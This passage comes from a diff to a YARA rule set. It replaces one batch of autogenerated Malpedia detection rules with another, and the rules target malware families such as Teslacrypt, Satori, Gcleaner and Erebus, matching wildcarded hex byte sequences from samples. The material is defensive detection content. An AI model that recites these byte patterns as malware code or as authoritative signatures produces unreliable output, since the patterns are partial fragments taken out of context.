ff33 b902000000 e8???????? 83c408 8945f0 ff750c } + $sequence_0 = { ff15???????? 56 ff15???????? 8b8c2418010000 } + $sequence_1 = { 8b4904 56 8b742410 56 8d542414 50 } + $sequence_2 = { 85c0 7404 50 ff5650 8b5660 } + $sequence_3 = { 8988100b0000 8d88740a0000 8988280b0000 33c9 c780180b000080cd0110 89901c0b0000 c780240b000098cd0110 } + $sequence_4 = { 894554 89542428 b910000000 33c0 8d7c2438 } + $sequence_5 = { 8d442440 c1e902 f3a5 8bca 50 83e103 } + $sequence_6 = { 5d 33c0 5b 81c4f8020000 c20400 8b35???????? 6800000100 } + $sequence_7 = { c7462400000000 83c610 6a00 56 ff15???????? 5e } + $sequence_8 = { 7cd9 8bf2 8b8e80000000 b8cdcccccc f7a684000000 c1ea04 } + $sequence_9 = { 83c404 395630 740d 8b542418 } + $sequence_10 = { 8d942410010000 52 6a00 6a00 } + $sequence_11 = { 8d842432020000 6a00 50 c684242c02000046 } + $sequence_12 = { 83ea01 898c3c90000000 75ed 8bd3 33ff 8d4900 } + $sequence_13 = { 8b742424 e9???????? 6803010000 8d442431 6a00 50 } + $sequence_14 = { 33c0 e8???????? 81c468040000 c3 3b0d???????? 7502 } condition: - 7 of them and filesize <197096 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Pkybot_Auto : FILE +rule MALPEDIA_Win_Wscspl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b29148a6-8685-5645-99d4-ca854d32849e" + id = "f31d95be-4f0b-51e3-8f5f-15d1afc6eb9e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pkybot_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wscspl_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "809773f54b9553ffea062fd7f87645abd3e261a3e38fb26640ff099fc49a005e" + logic_hash = "4a0c5de1937bca874bba721d790f101d8b394ac870591bd7e9ae3e7dc3c9255d" score = 75 quality = 75 tags = "FILE" @@ -160442,32 +163155,32 @@ rule MALPEDIA_Win_Pkybot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8bf8 83ffff 7429 56 56 } - $sequence_1 = { 8d45e0 50 8b06 83c004 50 } - $sequence_2 = { 8b4e04 21413c c741300e000000 897938 5f 5e } - $sequence_3 = { 7409 ff75dc e8???????? 59 56 } - $sequence_4 = { 8b0d???????? 894108 e8???????? a3???????? } - $sequence_5 = { 7518 ff35???????? e8???????? 59 893d???????? 893d???????? } - $sequence_6 = { 56 a3???????? e8???????? 83c448 } - $sequence_7 = { 57 6a10 ff7510 8d45ec 50 e8???????? } - $sequence_8 = { 7430 50 3bf7 7507 e8???????? eb05 e8???????? } - $sequence_9 = { 8d85ecfdffff 50 8d45f4 50 53 57 ff75fc } + $sequence_0 = { 740b b855000000 66a3???????? 8b4c2404 51 } + $sequence_1 = { 8bcd 8d742414 8d442418 e8???????? 0fbf442414 50 8d4c241c } + $sequence_2 = { 8d442430 50 68???????? 6a00 6a00 c744244000000000 } + $sequence_3 = { 8b74240c 3bf7 7435 8b3d???????? 8d4900 8b4618 8b4004 } + $sequence_4 = { 8d642400 8b0c18 8d1418 bf05000000 } + $sequence_5 = { 3bc1 763a 03c9 3bc1 } + $sequence_6 = { 663bf8 752f e8???????? 8b0d???????? } + $sequence_7 = { 51 ff15???????? ff15???????? 6888130000 } + $sequence_8 = { 8b1d???????? 55 33c0 56 83c1fb } + $sequence_9 = { 687c230000 8d44240c 6a01 50 ff15???????? 687c230000 68c10b0000 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <901120 } -rule MALPEDIA_Win_Unidentified_095_Auto : FILE +rule MALPEDIA_Win_Kdcsponge_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "37abc0ea-ddce-59f3-9ad7-8e440d8ff0bb" + id = "94fce6ec-ab5d-5082-ad22-afe2db84b161" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_095_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kdcsponge_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "2ccf7caa3b3d5540a5f23128f7d00405bc7a6134a0c6b4f4e250221b4826e780" + logic_hash = "8a36b853d0e2d90c09d30257cb4cad3c052e41eeb1a598728e2eabfd12dc7098" score = 75 quality = 75 tags = "FILE" @@ -160481,32 +163194,32 @@ rule MALPEDIA_Win_Unidentified_095_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffc8 6641833c465c 7505 6641892c46 4c8bbc24e8000000 } - $sequence_1 = { 85c0 7553 488bcf ff15???????? 488d4c2430 } - $sequence_2 = { 488bd0 48d3ca 4933d0 4b8794fe90440200 eb2d } - $sequence_3 = { 48c7c102000080 897c2420 ff15???????? 85c0 740c 8bc8 ff15???????? } - $sequence_4 = { 488d1519de0000 488d0df2dd0000 e8???????? 488d1516de0000 488d0d07de0000 e8???????? 488b4308 } - $sequence_5 = { 4881c490000000 5d c3 4053 4883ec20 488bd9 } - $sequence_6 = { 660f28c1 4c8d0dfb9e0000 f20f101d???????? f20f100d???????? f20f59da } - $sequence_7 = { 85c0 0f8502010000 837c243c04 7516 } - $sequence_8 = { eb19 488d3d3a440100 eb10 488d3d41440100 eb07 488d3d20440100 4883a4248000000000 } - $sequence_9 = { 75ed 488bcb 85d2 7507 e8???????? eb08 498bd1 } + $sequence_0 = { 80b9b104000001 c6810904000008 0f85bf000000 80b9ad04000000 c781a004000002000000 c7416002001100 7552 } + $sequence_1 = { 488b8228040000 4885c0 7507 488b8230040000 4883c002 4803c1 } + $sequence_2 = { 7507 c681c504000006 c7814004000003000000 c781ca04000004000000 e9???????? e9???????? 3c01 } + $sequence_3 = { 0f85d5000000 80b9ad04000001 0f85bf000000 f681ae04000008 0f84b2000000 488b896c040000 } + $sequence_4 = { 898520030000 e8???????? 488d0db15ffcff 48c1e602 0fb784b9c0550400 488d91b04c0400 488d8d24030000 } + $sequence_5 = { 488b542450 488b4e08 e8???????? 488d4c2440 ff15???????? 0fb74504 ffc7 } + $sequence_6 = { 448d4020 c745c048895c24 488d55c0 c745c420555657 488d0df1480200 c745c841544155 c745cc41564157 } + $sequence_7 = { c6830804000001 f20f1005???????? 8b05???????? c7436003000100 eb24 83f807 753d } + $sequence_8 = { 7507 c681c504000006 ba65000000 c744243004000000 448bca c744242804000000 448bc2 } + $sequence_9 = { c6470801 e9???????? 41b803000000 488d1578f90000 488bcb e8???????? 85c0 } condition: - 7 of them and filesize <339968 + 7 of them and filesize <720896 } -rule MALPEDIA_Win_Fonix_Auto : FILE +rule MALPEDIA_Win_Gcleaner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bd0f7338-d5ae-57b4-8254-a4a394cfa806" + id = "6f27809a-4a1b-5d62-97c7-de2eeddc46d9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fonix_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gcleaner_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "a1de19ea9d27789030065bff520751643f536c0deae9fbccf8fe2c31cafb92ef" + logic_hash = "7aee09652b701d76a6e86128872cf2cc44b3fc03358e24bd02f64455f78cd161" score = 75 quality = 75 tags = "FILE" @@ -160520,32 +163233,32 @@ rule MALPEDIA_Win_Fonix_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8d5508 c645fc0e 8d8df4fbffff e8???????? 51 51 } - $sequence_1 = { 83c408 85ff 0f8533ffffff 0f1045a8 8bb56cffffff 0f114590 f30f7e45b8 } - $sequence_2 = { c1c107 894c2434 8b4c2428 03ca 33f1 c1c610 03c6 } - $sequence_3 = { 8b7d74 8d4500 57 50 ff7578 8d4530 c645fc0a } - $sequence_4 = { c645fc1e e8???????? c645fc1f 68???????? 8d8d68fdffff e8???????? 68???????? } - $sequence_5 = { e8???????? bf6e060000 c645fc0a 57 e8???????? 59 8bf0 } - $sequence_6 = { 8bf0 ff5208 0faff0 8d4b0c 56 e8???????? } - $sequence_7 = { 8d8d0cfcffff e8???????? 83ec18 8d4508 } - $sequence_8 = { 8d4101 898d7cffffff 50 8d4dd8 e8???????? 8bd0 8b856cffffff } - $sequence_9 = { 50 56 e8???????? 83c40c 84c0 7404 } + $sequence_0 = { 8d8d70feffff 8d45b0 0f4345b0 51 50 } + $sequence_1 = { 8bd0 c645fc04 8d4dd8 e8???????? 83c410 } + $sequence_2 = { 660fd64010 8345e418 eb10 8d4dc8 } + $sequence_3 = { 660fd64610 c742e000000000 c742e40f000000 c642d000 8b42e8 894618 } + $sequence_4 = { e8???????? 8d8d60ffffff e8???????? 6a00 6a00 } + $sequence_5 = { c642d000 8b42e8 894618 8d42ec 83c61c 3bc7 } + $sequence_6 = { eb10 8d4dc8 51 50 } + $sequence_7 = { 7438 8035????????2e 8035????????2e 8035????????2e 8035????????2e 8035????????2e 8035????????2e } + $sequence_8 = { 52 51 e8???????? 83c408 85ff 0f8807010000 } + $sequence_9 = { c645fc02 83fa10 722c 8b4dc8 42 8bc1 } condition: - 7 of them and filesize <2226176 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Vmzeus_Auto : FILE +rule MALPEDIA_Elf_Satori_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6aa23f59-07e5-5545-b355-8ded6d796e51" + id = "ef9a3def-11bf-57c1-9abe-eaf3ea87bbf4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vmzeus_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.satori_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "cf57c567165f41d1d66d4120ec9208acf9ea89868aae72faa87074d6a7fc07a0" + logic_hash = "acc91f43f84cb8d9ebcbacb4d453867e5ba0d238d6255f05df970cd0ecb540bb" score = 75 quality = 75 tags = "FILE" @@ -160559,32 +163272,32 @@ rule MALPEDIA_Win_Vmzeus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 32c0 6a4c 8d7c242c 59 f3aa } - $sequence_1 = { 32c0 6a4c 8d7c242c 59 f3aa } - $sequence_2 = { 6a04 58 e9???????? 32c0 6a4c 8d7c242c 59 } - $sequence_3 = { 6a10 32c0 59 8bfb } - $sequence_4 = { f3a4 b001 eb02 32c0 5f 5e } - $sequence_5 = { 32c0 6a4c 8d7c242c 59 } - $sequence_6 = { 6a10 32c0 59 8bfb f3aa } - $sequence_7 = { 58 e9???????? 32c0 6a4c } - $sequence_8 = { f3a4 b001 eb02 32c0 5f } - $sequence_9 = { e9???????? 32c0 6a4c 8d7c242c } + $sequence_0 = { 85c0 7804 8b542414 89d0 83c41c } + $sequence_1 = { e8???????? b9???????? b802000000 89ca e8???????? } + $sequence_2 = { 89c6 53 89d3 83ec10 52 e8???????? } + $sequence_3 = { b802000000 e8???????? b905000000 ba???????? b802000000 e8???????? b908000000 } + $sequence_4 = { c744244800000000 e9???????? 8b542404 8b3482 6bc018 03442464 } + $sequence_5 = { e8???????? 83c414 6a1f e8???????? c7042420000000 e8???????? c785280400001e000000 } + $sequence_6 = { 85c0 7416 83ec0c ff35???????? e8???????? 59 6a00 } + $sequence_7 = { 3b410c 747c 8b45bc 83ec0c 8b55cc 8d5def 8945e0 } + $sequence_8 = { 6a04 56 53 e8???????? 8844243a 83c420 6a00 } + $sequence_9 = { 6a15 68???????? 6a1d e8???????? 83c40c 6a15 68???????? } condition: - 7 of them and filesize <475136 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Merdoor_Auto : FILE +rule MALPEDIA_Win_Kikothac_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a99af5cd-bc04-5bf5-95d0-af03ff89050f" + id = "48840edd-1eda-587e-96d1-699222be4802" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.merdoor_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kikothac_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "b95cd242972456e72e114f53ab84ee24aaf18f568fbe98e73f19f67ea1e8459f" + logic_hash = "ddecb618114edd432a6ac40a5ecfd59b3208358e4b28a6940c432c46b4921216" score = 75 quality = 75 tags = "FILE" @@ -160598,32 +163311,32 @@ rule MALPEDIA_Win_Merdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5e 3bc8 7215 50 8d8398000000 50 6aff } - $sequence_1 = { 8d85f0fdffff 8bcb 50 e8???????? 8b4dfc f7d8 5f } - $sequence_2 = { 8ac1 eb04 b011 2ac1 f6d0 fec1 } - $sequence_3 = { 0f87af000000 8d8ee4020000 894df4 7443 8b01 8bf0 8bd0 } - $sequence_4 = { ffd7 8986c0000000 83bec400000000 750f 8d4588 } - $sequence_5 = { 3044159c 42 80f90f 72da 660f6f05???????? 32c9 f30f7f853cffffff } - $sequence_6 = { 85c0 751c 8d85ecfeffff 50 ff15???????? 8b400c 8b00 } - $sequence_7 = { 85c0 7403 8d3410 8b440b10 85c0 7438 } - $sequence_8 = { 53 56 8bf1 57 83cfff 8d9eec020000 53 } - $sequence_9 = { 8986c0000000 83bec400000000 750f 8d4588 50 ff7604 ffd7 } + $sequence_0 = { 85c0 7516 8b86942f4100 b301 85c0 740a } + $sequence_1 = { 50 ff15???????? a3???????? 3bc3 7507 32c0 5b } + $sequence_2 = { 56 33f6 57 8975fc ffd3 85c0 } + $sequence_3 = { c60424cd 8d642438 e9???????? c64424046e 895500 9c 6689742408 } + $sequence_4 = { c1c80a e9???????? 66894500 9c } + $sequence_5 = { 8b441604 51 50 ff15???????? 85c0 7516 } + $sequence_6 = { 51 68102ba40e ff3424 9c 8f442438 } + $sequence_7 = { 6820040000 57 57 57 } + $sequence_8 = { 60 f6c356 c6442404ab 20d0 } + $sequence_9 = { e9???????? 8b7c242c 66c70424dc83 98 9f 8b442430 660fbeeb } condition: - 7 of them and filesize <307200 + 7 of them and filesize <581632 } -rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE +rule MALPEDIA_Win_Teslacrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6cd7c8c4-20c9-5c58-baa7-e42d545001dc" + id = "cf4cf463-c704-58da-bdf6-218fd6a96530" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anatova_ransom_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.teslacrypt_auto.yar#L1-L177" license_url = "N/A" - logic_hash = "2867d50f6d60295cd1f6876cf7316363316dea4699194cf318a991da479d380e" + logic_hash = "204f6818406ce562647f2b4540c54737aa88569de9afd450b681fd9a49a46e00" score = 75 quality = 75 tags = "FILE" @@ -160637,34 +163350,40 @@ rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d05ec570000 48894588 488d05eb570000 48894590 } - $sequence_1 = { b805000000 4989c3 488b01 4989c2 4c89d1 4c89da e8???????? } - $sequence_2 = { 4989c2 4c89d1 e8???????? e9???????? 488b45e0 4989c2 4c89d1 } - $sequence_3 = { e8???????? 488b05???????? 488b0d???????? 488b15???????? 488945f0 488d45fc 4889442420 } - $sequence_4 = { 4883f800 0f84b2000000 488b05???????? 4883f800 0f84a1000000 488b05???????? } - $sequence_5 = { 4989c2 4c89d1 e8???????? 488b05???????? 4883f800 0f843e000000 8b05???????? } - $sequence_6 = { b800000000 4989c3 b802000000 4989c2 4c89d1 4c89da 4c8b1d???????? } - $sequence_7 = { 4989c0 488b45d8 4989c3 488b45a0 4989c2 4c89d1 4c89da } - $sequence_8 = { 4989c1 b800000000 4989c0 b800000000 4989c3 } - $sequence_9 = { 48b80f00000000000000 4989c0 b800000000 4989c3 488d45b1 4989c2 4c89d1 } + $sequence_0 = { 31f7 897d24 31f9 894d28 31ca 89552c 89d0 } + $sequence_1 = { 334534 894554 334538 894558 } + $sequence_2 = { 3345f8 894518 3345fc 89451c 51 52 89f2 } + $sequence_3 = { 0f8452030000 81ffc0000000 0f84ac010000 81ffe0000000 740a b8ffffffff } + $sequence_4 = { 31f7 897d44 31f9 894d48 31ca } + $sequence_5 = { 334538 894558 33453c 89455c 51 52 89f2 } + $sequence_6 = { 31f7 897d04 31f9 894d08 } + $sequence_7 = { 335d04 334d08 33550c 81ffa0000000 0f8456030000 } + $sequence_8 = { 0f842d010000 8b44243c 8b08 83f900 894c2430 741f 8b442464 } + $sequence_9 = { 8b4c2430 01c8 8b542474 8b742470 031406 891406 } + $sequence_10 = { 890c24 e8???????? 8d0dc1304b00 8b542410 894208 890c24 } + $sequence_11 = { 8902 83f800 894c2408 7432 8b442418 83c004 } + $sequence_12 = { 31c0 8b4c2414 29c8 8b54240c 21c2 01ca 89542408 } + $sequence_13 = { b801000000 8b4c245c 8b9180000000 8b742464 01d6 8b7c2464 8b54170c } + $sequence_14 = { c70100000000 c7410c00000000 c7410800000000 8b0d???????? 8b4920 8b742450 8b7a38 } + $sequence_15 = { 8b5120 89e6 8d7c2468 897e0c } condition: - 7 of them and filesize <671744 + 7 of them and filesize <1187840 } -rule MALPEDIA_Win_Radamant_Auto : FILE +rule MALPEDIA_Win_Infy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1ede87f9-320c-576f-9524-930f09ad6207" + id = "57c24fda-e429-5a88-80d2-235251d4052e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.radamant_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.infy_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "add6ca5b01c9d6d8dad27d0b268d58bbdb18019e152c79d40b24c8426bcce310" - score = 75 - quality = 75 + logic_hash = "97f3b09f4f39ef998f79ec8093433c607a41cb99a12ab0573691bf5dec73bf57" + score = 60 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -160676,32 +163395,32 @@ rule MALPEDIA_Win_Radamant_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8802 8b5510 42 8b45f8 } - $sequence_1 = { 890424 e8???????? 8b85c8f6ffff 890424 e8???????? 8b85d4f6ffff 890424 } - $sequence_2 = { 8d45f0 ff00 eb9b c9 } - $sequence_3 = { 01d0 8d148500000000 01d0 29c1 89c8 83c061 8945b0 } - $sequence_4 = { 331485b0164100 89d0 8945e8 8b55fc 83c204 8b45f4 c1e818 } - $sequence_5 = { 8d148500000000 01d0 29c1 89c8 83c061 8945b0 } - $sequence_6 = { c1e818 0fb6c0 0fb680b0094100 31d0 8901 8b4df4 83c124 } - $sequence_7 = { 8b8520feffff 890424 e8???????? 83ec0c 83f8ff 752a 8b45c4 } - $sequence_8 = { e8???????? 8b45f4 890424 e8???????? 83c424 5b 5d } - $sequence_9 = { 8d45e8 c1000a 8b55f4 8d45e8 0110 8b45f0 f7d0 } + $sequence_0 = { 7e24 8945d4 807de300 7409 8b45e4 66833820 } + $sequence_1 = { 7409 8b13 8bc3 e8???????? 85c0 7405 83e804 } + $sequence_2 = { 57 33c9 894df8 8955f0 } + $sequence_3 = { 7553 837e1400 7442 837e1c00 } + $sequence_4 = { 668378f602 7412 6a00 89e0 } + $sequence_5 = { 68???????? 8d45c8 ba09000000 e8???????? 8d45ec } + $sequence_6 = { 807de300 7409 8b45e4 66833820 7304 33c0 eb02 } + $sequence_7 = { c1e002 034610 f6400380 0f94c2 83e201 8955e0 85d2 } + $sequence_8 = { e8???????? 8bd0 81e2ff000000 2500ff0000 c1e808 83fa05 7505 } + $sequence_9 = { e8???????? 83c40c 5b 5d c20800 55 8bec } condition: - 7 of them and filesize <204800 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Datper_Auto : FILE +rule MALPEDIA_Win_Rook_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "144df714-10f7-5eb5-ac00-48d1c0a0517d" + id = "18a58274-365f-5d90-8056-28a56db76f76" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.datper_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rook_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "96f11afeb919508bb147708a5d367711547bdbf470c62d9b42f3889c5cdbbcd4" + logic_hash = "8b05af9f0d6f5102cdf2e062676438cba9dcdb9d6b25adc560d5025ee81a7b52" score = 75 quality = 75 tags = "FILE" @@ -160715,32 +163434,32 @@ rule MALPEDIA_Win_Datper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c9 ba0c000000 e8???????? c78564d7ffff0c000000 33c0 898568d7ffff } - $sequence_1 = { 5a 59 59 648910 68???????? 8d85e8f3ffff } - $sequence_2 = { 0fb607 8845f7 0fb6c1 8b55fc 0fb60402 8807 } - $sequence_3 = { 50 ff15???????? 85c0 741f 8b8424a80d0000 894348 } - $sequence_4 = { 895de4 895de8 895df4 894df0 8955f8 8945fc 8d45fc } - $sequence_5 = { 53 e8???????? a3???????? 8d95a8fbffff b8???????? e8???????? 8b85a8fbffff } - $sequence_6 = { c78568d7ffff0c000000 33c0 89856cd7ffff c78570d7ffffffffffff 6a00 6a01 8d8568d7ffff } - $sequence_7 = { 8b45fc e8???????? 50 e8???????? 8d8564d7ffff 33c9 ba0c000000 } - $sequence_8 = { 8d85f0fbffff 50 53 e8???????? 8945f0 a1???????? 50 } - $sequence_9 = { 53 e8???????? 6800800000 6a00 56 } + $sequence_0 = { 488d05478d0200 c7470801000000 48c7471003000000 48894748 488d05c59e0200 } + $sequence_1 = { 0f8521ffffff 44882b eb7b 488b9540070000 4c8d05979e0000 498bce } + $sequence_2 = { 85c0 0f85f5020000 488b8d08080000 488d85f8070000 4c89a424c0080000 488d15ffb90400 } + $sequence_3 = { ff15???????? 488bd3 488d0d82ac0400 448bc0 e8???????? 488b0d???????? 4c8bc3 } + $sequence_4 = { 4433d0 418bc1 48c1e808 0fb6c8 41c1e208 420fb6843170990500 4433d0 } + $sequence_5 = { 488d85f8070000 4c89a424c0080000 488d15ffb90400 4889442428 4c8d25d3450500 4c89ac24b8080000 } + $sequence_6 = { 488d542460 488d0d1c380500 e8???????? 488d9510020000 498bcc ff15???????? 4839bd10020000 } + $sequence_7 = { 48894760 488d0535980200 c7475001000000 48c7475804000000 48894778 488d050b710300 c7476801000000 } + $sequence_8 = { 4898 4d8d3446 83ed01 7586 4885f6 0f84d3000000 488bce } + $sequence_9 = { 4c8d05f7140300 488986b0000000 488d8e98000000 e8???????? 8bd8 85c0 0f8517ffffff } condition: - 7 of them and filesize <253952 + 7 of them and filesize <843776 } -rule MALPEDIA_Win_Rc2Fm_Auto : FILE +rule MALPEDIA_Win_Mangzamel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e4f1d324-0720-53a3-a9da-cb15ebd44ad4" + id = "efd17f11-bd84-5994-8489-ce27d4f0f0e6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rc2fm_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mangzamel_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "2b4b23efded831a0bcad4decee49c98aca63a9f5af170fcd017bff9b432b8451" + logic_hash = "e3b6cc187254084e27045992bdf0d8b8ff879105635bf8f3e82d14e2723774a4" score = 75 quality = 75 tags = "FILE" @@ -160754,32 +163473,32 @@ rule MALPEDIA_Win_Rc2Fm_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48894c2408 55 57 4154 4156 488d6c24c1 4881ecb8000000 } - $sequence_1 = { 4883ec20 498bf1 4d8bf0 4c8bfa 488bd9 ff15???????? } - $sequence_2 = { 415c 5f 5b c3 488b09 4889ac2480000000 } - $sequence_3 = { b001 eb14 448bc3 ba00000500 b91b000100 e8???????? } - $sequence_4 = { 488b4808 4c897d00 4c89742460 48894df8 8d4e14 e8???????? 6690 } - $sequence_5 = { 448bc0 e8???????? eb0f ba0a000b00 b911000100 e8???????? 488b0d???????? } - $sequence_6 = { 0fb68c28304c0200 eb0c 48c1e807 0fb68c28304d0200 4863c1 448bd7 66ff8483b0090000 } - $sequence_7 = { 88040a ff4328 8b5328 0fb64745 488b4b10 88040a ff4328 } - $sequence_8 = { 83b98804000000 488bd9 7431 ff8b88040000 8b8388040000 4c8b84c360040000 4d85c0 } - $sequence_9 = { 0f8781010000 83fd09 0f8778010000 448b642478 4183fc04 0f8769010000 488b4938 } + $sequence_0 = { 8b7508 837e1410 7404 32c0 eb6e 8b06 53 } + $sequence_1 = { 8d8dd4feffff e8???????? 33db 8d8dc0fdffff 895dfc e8???????? 8d85d4feffff } + $sequence_2 = { 6a00 8bce ff7674 e8???????? 6a01 6804000102 8bce } + $sequence_3 = { ff7508 e8???????? 84c0 7404 c645f301 8b4df4 } + $sequence_4 = { 8bd0 8b00 8b5208 3932 7506 837a0400 } + $sequence_5 = { e8???????? 33c0 8bce 50 50 50 ff742414 } + $sequence_6 = { 8bce ff7508 ff5040 8ac3 5e 5b 5d } + $sequence_7 = { 57 8b7c2414 33c0 8907 8b0d???????? 3bc8 } + $sequence_8 = { 8d4b6c e8???????? 5e 5b c3 56 8bf1 } + $sequence_9 = { 8b74240c 57 8b7c240c 8d4602 50 57 e8???????? } condition: - 7 of them and filesize <410624 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Bee_Auto : FILE +rule MALPEDIA_Win_Erebus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cf854a1b-a3fa-5497-9620-9eb04ca1acba" + id = "3b8e48a2-ab39-5161-a03c-847ada2f2257" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bee_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.erebus_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "d1087a1b19c31419362e6bad586912e9950c25554053241c2a8ca3db38a0bc54" + logic_hash = "f6199452e86aabb91b90d01b525d7eacea470d9b218c6e5261dcc5c5c7e57399" score = 75 quality = 75 tags = "FILE" @@ -160793,19 +163512,19 @@ rule MALPEDIA_Win_Bee_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - 